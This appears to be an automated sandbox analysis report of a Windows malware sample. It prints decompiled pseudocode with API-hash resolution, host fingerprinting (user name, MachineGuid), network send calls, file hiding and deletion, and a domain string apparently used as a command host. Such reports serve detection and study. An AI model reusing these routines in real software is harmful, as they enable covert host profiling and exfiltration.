                          						_push( *0x49fde0);
                          						_t27 = E00405872();
                          						_t72 = _t71 + 0x10;
                          					} else {
                          						_push(_t65);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t27 = E00402BAB(_t65);
                          						_t72 = _t71 + 0x14;
                          					}
                          					_t66 = E00406189(_t27);
                          					_t79 = _t66;
                          					if(_t66 == 0) {
                          						E00405781( *0x49fde0, 0);
                          						E00405781( *0x49fde0, 0);
                          						_t73 = _t72 + 0x10;
                          					} else {
                          						E00405781( *0x49fde0,  *_t66);
                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                          						E00402BAB(_t66);
                          						_t73 = _t72 + 0x14;
                          					}
                          					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                          					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                          					_t35 = E0040642C(_t79); // executed
                          					E004058D4( *0x49fde0, _t35);
                          					E004058D4( *0x49fde0, _v24);
                          					E004058D4( *0x49fde0, _v20);
                          					E004058D4( *0x49fde0, _v16);
                          					E004058D4( *0x49fde0, _v12);
                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                          					_t68 = _t73 + 0x48;
                          				}
                          				_t80 =  *0x49fde4;
                          				if( *0x49fde4 == 0) {
                          					_t10 =  *0x49fde0;
                          					goto L16;
                          				}
                          				return E00405695(_t53,  *0x49fde0);
                          			}






























                          0x00412d31
                          0x00412d34
                          0x00412d39
                          0x00412d3c
                          0x00412d49
                          0x00412d50
                          0x00412d52
                          0x00412f24
                          0x00412f24
                          0x00412f2b
                          0x00412f30
                          0x00412f32
                          0x00412f37
                          0x00412f41
                          0x00412f53
                          0x00412f53
                          0x00412f5b
                          0x00412f60
                          0x00412d58
                          0x00412d58
                          0x00412d63
                          0x00412d6c
                          0x00412d73
                          0x00412d7e
                          0x00412d7f
                          0x00412d80
                          0x00412d81
                          0x00412d82
                          0x00412d8f
                          0x00412da1
                          0x00412da6
                          0x00412dae
                          0x00412db0
                          0x00412db1
                          0x00412db5
                          0x00412dce
                          0x00412dcf
                          0x00412dd5
                          0x00412dda
                          0x00412db7
                          0x00412db7
                          0x00412db8
                          0x00412dbe
                          0x00412dc4
                          0x00412dc9
                          0x00412dc9
                          0x00412de2
                          0x00412de4
                          0x00412de5
                          0x00412de7
                          0x00412de9
                          0x00412e02
                          0x00412e03
                          0x00412e09
                          0x00412e0e
                          0x00412deb
                          0x00412deb
                          0x00412dec
                          0x00412df2
                          0x00412df8
                          0x00412dfd
                          0x00412dfd
                          0x00412e11
                          0x00412e17
                          0x00412e19
                          0x00412e1a
                          0x00412e1e
                          0x00412e37
                          0x00412e38
                          0x00412e3e
                          0x00412e43
                          0x00412e20
                          0x00412e20
                          0x00412e21
                          0x00412e27
                          0x00412e2d
                          0x00412e32
                          0x00412e32
                          0x00412e4b
                          0x00412e4d
                          0x00412e4f
                          0x00412e7e
                          0x00412e8a
                          0x00412e8f
                          0x00412e51
                          0x00412e59
                          0x00412e67
                          0x00412e6d
                          0x00412e72
                          0x00412e72
                          0x00412e9e
                          0x00412eaf
                          0x00412eb4
                          0x00412ec0
                          0x00412ece
                          0x00412edc
                          0x00412eea
                          0x00412ef8
                          0x00412f0f
                          0x00412f14
                          0x00412f14
                          0x00412f17
                          0x00412f1d
                          0x00412f1f
                          0x00000000
                          0x00412f1f
                          0x00412f74

                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040632F() {
                          				char _v8;
                          				void* _t4;
                          				void* _t7;
                          				void* _t16;
                          
                          				_t16 = E00402B7C(0x208);
                          				if(_t16 == 0) {
                          					L4:
                          					_t4 = 0;
                          				} else {
                          					E0040338C(_t16, 0, 0x104);
                          					_t1 =  &_v8; // 0x4143e8
                          					_v8 = 0x208;
                          					_t7 = E00406069(_t16, _t1); // executed
                          					if(_t7 == 0) {
                          						E00402BAB(_t16);
                          						goto L4;
                          					} else {
                          						_t4 = _t16;
                          					}
                          				}
                          				return _t4;
                          			}







                          0x00406340
                          0x00406345
                          0x00406373
                          0x00406373
                          0x00406347
                          0x0040634f
                          0x00406354
                          0x00406357
                          0x0040635c
                          0x00406366
                          0x0040636d
                          0x00000000
                          0x00406368
                          0x00406368
                          0x00406368
                          0x00406366
                          0x0040637a

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                          				int _t7;
                          				void* _t8;
                          
                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                          				return _t7;
                          			}





                          0x00406094
                          0x004060a8
                          0x004060ab

                          APIs
                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InformationToken
                          • String ID: IDA
                          • API String ID: 4114910276-365204570
                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                          				_Unknown_base(*)()* _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                          				_t1 =  &_a8; // 0x403173
                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                          				return _t5;
                          			}





                          0x00402c10
                          0x00402c15
                          0x00402c1b
                          0x00402c1e

                          APIs
                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                          				void* _v8;
                          				int _v12;
                          				void* __ebx;
                          				char* _t10;
                          				long _t13;
                          				char* _t27;
                          
                          				_push(_t21);
                          				_t27 = E00402B7C(0x208);
                          				if(_t27 == 0) {
                          					L4:
                          					_t10 = 0;
                          				} else {
                          					E00402B4E(_t27, 0, 0x208);
                          					_v12 = 0x208;
                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                          					if(_t13 != 0) {
                          						E00402BAB(_t27);
                          						goto L4;
                          					} else {
                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                          						E00404A39(_v8); // executed
                          						_t10 = _t27;
                          					}
                          				}
                          				return _t10;
                          			}









                          0x00404a56
                          0x00404a65
                          0x00404a6a
                          0x00404ad1
                          0x00404ad1
                          0x00404a6c
                          0x00404a71
                          0x00404a79
                          0x00404a85
                          0x00404a9a
                          0x00404a9e
                          0x00404acb
                          0x00000000
                          0x00404aa0
                          0x00404aac
                          0x00404abc
                          0x00404ac1
                          0x00404ac6
                          0x00404ac6
                          0x00404a9e
                          0x00404ad9

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
                          				signed int _v8;
                          				char _v12;
                          				short _v16;
                          				char _v20;
                          				void* __ebx;
                          				intOrPtr* _t12;
                          				signed int _t13;
                          				intOrPtr* _t14;
                          				signed int _t15;
                          				void* _t24;
                          
                          				_v16 = 0x500;
                          				_v20 = 0;
                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                          				_v8 = _t13;
                          				if(_t13 != 0) {
                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                          					asm("sbb eax, eax");
                          					_v8 = _v8 &  ~_t15;
                          					E0040604F(_v12);
                          					return _v8;
                          				}
                          				return _t13;
                          			}













                          0x004060c6
                          0x004060d5
                          0x004060d8
                          0x004060f4
                          0x004060f6
                          0x004060fb
                          0x0040610a
                          0x00406115
                          0x0040611c
                          0x0040611e
                          0x00406121
                          0x00000000
                          0x0040612a
                          0x0040612f

                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                          				void* _t3;
                          				int _t5;
                          
                          				_t3 = E00403D4D(__eflags, _a4); // executed
                          				if(_t3 == 0) {
                          					__eflags = 0;
                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                          					return _t5;
                          				} else {
                          					return 1;
                          				}
                          			}





                          0x00403c68
                          0x00403c70
                          0x00403c78
                          0x00403c82
                          0x00403c8b
                          0x00403c8f
                          0x00403c72
                          0x00403c76
                          0x00403c76

                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
                          				short _v40;
                          				intOrPtr* _t6;
                          				void* _t10;
                          
                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                          				 *_t6( &_v40); // executed
                          				return 0 | _v40 == 0x00000009;
                          			}






                          0x0040643c
                          0x00406445
                          0x00406454

                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t5;
                          
                          				_t5 = _a12;
                          				if(_t5 == 0) {
                          					_t5 = E00405D0B(_a8) + 1;
                          				}
                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                          				return _t5;
                          			}




                          0x00404eed
                          0x00404ef2
                          0x00404efd
                          0x00404efd
                          0x00404f07
                          0x00404f0e

                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                          				return _t6;
                          			}





                          0x00403bdd
                          0x00403beb
                          0x00403bee

                          APIs
                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                          				return _t4;
                          			}





                          0x0040428a
                          0x00404297
                          0x0040429a

                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                          				long _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                          				return _t5;
                          			}





                          0x00404a27
                          0x00404a35
                          0x00404a38

                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                          				_t4 = FindCloseChangeNotification(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c4d
                          0x00403c55
                          0x00403c58

                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                          				_t4 = DeleteFileW(_a4); // executed
                          				return _t4;
                          			}





                          0x00403c15
                          0x00403c1d
                          0x00403c20

                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
                          				struct HINSTANCE__* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                          				_t4 = LoadLibraryW(_a4); // executed
                          				return _t4;
                          			}





                          0x00402c2c
                          0x00402c34
                          0x00402c37

                          APIs
